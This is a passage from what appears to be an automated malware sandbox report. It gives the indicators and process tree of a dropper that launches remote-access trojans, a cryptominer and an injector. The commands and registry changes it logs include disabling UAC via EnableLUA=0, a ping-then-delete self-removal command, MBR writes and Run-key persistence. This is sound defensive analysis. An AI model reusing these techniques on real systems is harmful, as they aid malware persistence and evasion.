powershell.exe Token: 35 4828 powershell.exe Token: 36 4828 powershell.exe Token: SeIncreaseQuotaPrivilege 4828 powershell.exe Token: SeSecurityPrivilege 4828 powershell.exe Token: SeTakeOwnershipPrivilege 4828 powershell.exe Token: SeLoadDriverPrivilege 4828 powershell.exe Token: SeSystemProfilePrivilege 4828 powershell.exe Token: SeSystemtimePrivilege 4828 powershell.exe Token: SeProfSingleProcessPrivilege 4828 powershell.exe Token: SeIncBasePriorityPrivilege 4828 powershell.exe Token: SeCreatePagefilePrivilege 4828 powershell.exe Token: SeBackupPrivilege 4828 powershell.exe Token: SeRestorePrivilege 4828 powershell.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 2400 iexplore.exe 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 5060 AddInProcess.exe 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 3352 Explorer.EXE 3352 Explorer.EXE 3352 Explorer.EXE -
Suspicious use of SetWindowsHookEx 18 IoCs
pid Process 4836 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe 1360 EXCEL.EXE 1360 EXCEL.EXE 1360 EXCEL.EXE 1360 EXCEL.EXE 688 360TS_Setup.exe 4976 360TS_Setup.exe 1360 EXCEL.EXE 2156 jxszdjp.exe 2156 jxszdjp.exe 2156 jxszdjp.exe 2400 iexplore.exe 2400 iexplore.exe 3732 IEXPLORE.EXE 3732 IEXPLORE.EXE 3116 BroomSetup.exe 3748 AUTOKEY.exe 3748 AUTOKEY.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4544 wrote to memory of 4608 4544 4363463463464363463463463.exe 97 PID 4544 wrote to memory of 4608 4544 4363463463464363463463463.exe 97 PID 2516 wrote to memory of 2280 2516 cmd.exe 108 PID 2516 wrote to memory of 2280 2516 cmd.exe 108 PID 212 wrote to memory of 2268 212 cmd.exe 107 PID 212 wrote to memory of 2268 212 cmd.exe 107 PID 2516 wrote to memory of 3440 2516 cmd.exe 109 PID 2516 wrote to memory of 3440 2516 cmd.exe 109 PID 212 wrote to memory of 4548 212 cmd.exe 110 PID 212 wrote to memory of 4548 212 cmd.exe 110 PID 2516 wrote to memory of 1848 2516 cmd.exe 111 PID 2516 wrote to memory of 1848 2516 cmd.exe 111 PID 212 wrote to memory of 2892 212 cmd.exe 112 PID 212 wrote to memory of 2892 212 cmd.exe 112 PID 2516 wrote to memory of 3888 2516 cmd.exe 113 PID 2516 wrote to memory of 3888 2516 cmd.exe 113 PID 2516 wrote to memory of 3928 2516 cmd.exe 114 PID 2516 wrote to memory of 3928 2516 cmd.exe 114 PID 212 wrote to memory of 2160 212 cmd.exe 115 PID 212 wrote to memory of 2160 212 cmd.exe 115 PID 2516 wrote to memory of 4540 2516 cmd.exe 116 PID 2516 wrote to memory of 4540 2516 cmd.exe 116 PID 2516 wrote to memory of 688 2516 cmd.exe 117 PID 2516 wrote to memory of 688 2516 cmd.exe 117 PID 2516 wrote to memory of 2584 2516 cmd.exe 118 PID 2516 wrote to memory of 2584 2516 cmd.exe 118 PID 2516 wrote to memory of 3076 2516 cmd.exe 119 PID 2516 wrote to memory of 3076 2516 cmd.exe 119 PID 2516 wrote to memory of 2948 2516 cmd.exe 120 PID 2516 wrote to memory of 2948 2516 cmd.exe 120 PID 3116 wrote to memory of 4044 3116 powershell.exe 123 PID 3116 wrote to memory of 4044 3116 powershell.exe 123 PID 4544 wrote to memory of 2928 4544 4363463463464363463463463.exe 125 PID 4544 wrote to memory of 2928 4544 4363463463464363463463463.exe 125 PID 4544 wrote to memory of 4836 4544 4363463463464363463463463.exe 127 PID 4544 wrote to memory of 4836 4544 4363463463464363463463463.exe 127 PID 4544 wrote to memory of 4836 4544 4363463463464363463463463.exe 127 PID 4544 wrote to memory of 4312 4544 4363463463464363463463463.exe 133 PID 4544 wrote to memory of 4312 4544 4363463463464363463463463.exe 133 PID 4544 wrote to memory of 4312 4544 4363463463464363463463463.exe 133 PID 4312 wrote to memory of 4172 4312 srr.exe 137 PID 4312 wrote to memory of 4172 4312 srr.exe 137 PID 4312 wrote to memory of 4172 4312 srr.exe 137 PID 1728 wrote to memory of 3888 1728 Ghxyq.exe 135 PID 1728 wrote to memory of 3888 1728 Ghxyq.exe 135 PID 1728 wrote to memory of 3888 1728 Ghxyq.exe 135 PID 4172 wrote to memory of 688 4172 cmd.exe 138 PID 4172 wrote to memory of 688 4172 cmd.exe 138 PID 4172 wrote to memory of 688 4172 cmd.exe 138 PID 2792 wrote to memory of 408 2792 cmd.exe 140 PID 2792 wrote to memory of 408 2792 cmd.exe 140 PID 2792 wrote to memory of 1916 2792 cmd.exe 155 PID 2792 wrote to memory of 1916 2792 cmd.exe 155 PID 2792 wrote to memory of 1832 2792 cmd.exe 144 PID 2792 wrote to memory of 1832 2792 cmd.exe 144 PID 2792 wrote to memory of 1624 2792 cmd.exe 143 PID 2792 wrote to memory of 1624 2792 cmd.exe 143 PID 2792 wrote to memory of 5004 2792 cmd.exe 154 PID 2792 wrote to memory of 5004 2792 cmd.exe 154 PID 2792 wrote to memory of 2428 2792 cmd.exe 153 PID 2792 wrote to memory of 2428 2792 cmd.exe 153 PID 2792 wrote to memory of 4828 2792 cmd.exe 150 PID 2792 wrote to memory of 4828 2792 cmd.exe 150 PID 2792 wrote to memory of 4196 2792 cmd.exe 145 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" InstallSetup2.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3352 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- DcRat
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\Files\iox.exe"C:\Users\Admin\AppData\Local\Temp\Files\iox.exe"3⤵
- Executes dropped EXE
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 5404⤵
- Program crash
PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\srr.exe"C:\Users\Admin\AppData\Local\Temp\Files\srr.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\Files\srr.exe > nul4⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.15⤵
- Runs ping.exe
PID:688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\is-DSI8J.tmp\is-RKAFE.tmp"C:\Users\Admin\AppData\Local\Temp\is-DSI8J.tmp\is-RKAFE.tmp" /SL4 $A01CA "C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe" 9740347 522244⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:4972 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "UCR1163"5⤵PID:5048
-
-
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe"C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe" -i5⤵
- Executes dropped EXE
PID:4396
-
-
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe"C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\UdioConverterRipper.exe" -s5⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"3⤵
- Executes dropped EXE
PID:2348
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PsLoggedon.exe"C:\Users\Admin\AppData\Local\Temp\Files\PsLoggedon.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\Files\._cache_PsLoggedon.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_PsLoggedon.exe"4⤵
- Executes dropped EXE
PID:3104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 7965⤵
- Program crash
PID:4456
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Looks for VMWare services registry key.
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
PID:4288 -
C:\Users\Admin\AppData\Local\Temp\Files\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
PID:4768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 7966⤵
- Program crash
PID:3852
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵PID:5148
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:3844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 11327⤵
- Program crash
PID:5144
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵PID:5680
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:3968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 10927⤵
- Program crash
PID:5060
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:4112 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 11247⤵
- Program crash
PID:2944
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1200 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 10767⤵
- Program crash
PID:4948
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:2664 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:3852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 10767⤵
- Program crash
PID:948
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1800 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:2268 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 10847⤵
- Program crash
PID:3668
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:3484 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 10767⤵
- Program crash
PID:5368
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5216 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:5064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 10807⤵
- Program crash
PID:5148
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:1056 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4000 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 11327⤵
- Program crash
PID:2816
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5152 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:4888 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 11367⤵
- Program crash
PID:3172
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:2500 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:5164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 10807⤵
- Program crash
PID:460
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:4816 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
PID:2316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 11047⤵
- Program crash
PID:5388
-
-
-
-
C:\ProgramData\Java Updater\139k3s9mie973k.exe/prstb5⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:920 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
- Modifies firewall policy service
- Enumerates VirtualBox registry keys
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
PID:724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=4⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:688 -
C:\Program Files (x86)\1705419823_0\360TS_Setup.exe"C:\Program Files (x86)\1705419823_0\360TS_Setup.exe" /c:WW.Datacash.CPI202304 /pmode:2 /syncid0_2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall5⤵
- Looks for VMWare services registry key.
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4616
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"C:\Users\Admin\AppData\Local\Temp\Files\VoidRAT.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"3⤵
- Executes dropped EXE
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe"C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe"3⤵
- Executes dropped EXE
PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jxszdjp.exe"C:\Users\Admin\AppData\Local\Temp\Files\jxszdjp.exe"3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\Files\jxszdjpSrv.exeC:\Users\Admin\AppData\Local\Temp\Files\jxszdjpSrv.exe4⤵
- Executes dropped EXE
PID:2940 -
C:\Program Files (x86)\Microsoft\DesktopLayer.exe"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"5⤵
- Executes dropped EXE
PID:5076 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"6⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2400 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2400 CREDAT:17410 /prefetch:27⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3732
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"3⤵
- Executes dropped EXE
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\is-K0D0E.tmp\is-I2SOJ.tmp"C:\Users\Admin\AppData\Local\Temp\is-K0D0E.tmp\is-I2SOJ.tmp" /SL4 $10372 "C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe" 9527549 522244⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"3⤵
- Executes dropped EXE
PID:3640 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1B8.tmp\1B9.tmp\1BA.bat C:\Users\Admin\AppData\Local\Temp\Files\XDisk.exe"4⤵PID:2080
-
C:\Windows\system32\fsutil.exefsutil dirty query C:5⤵PID:4876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"3⤵
- Executes dropped EXE
PID:4148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 14444⤵
- Program crash
PID:3456
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2532 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe4⤵
- Looks for VMWare services registry key.
- Maps connected drives based on registry
PID:3196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd" "5⤵PID:1268
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000843021\DoNothing.cmd"6⤵PID:484
-
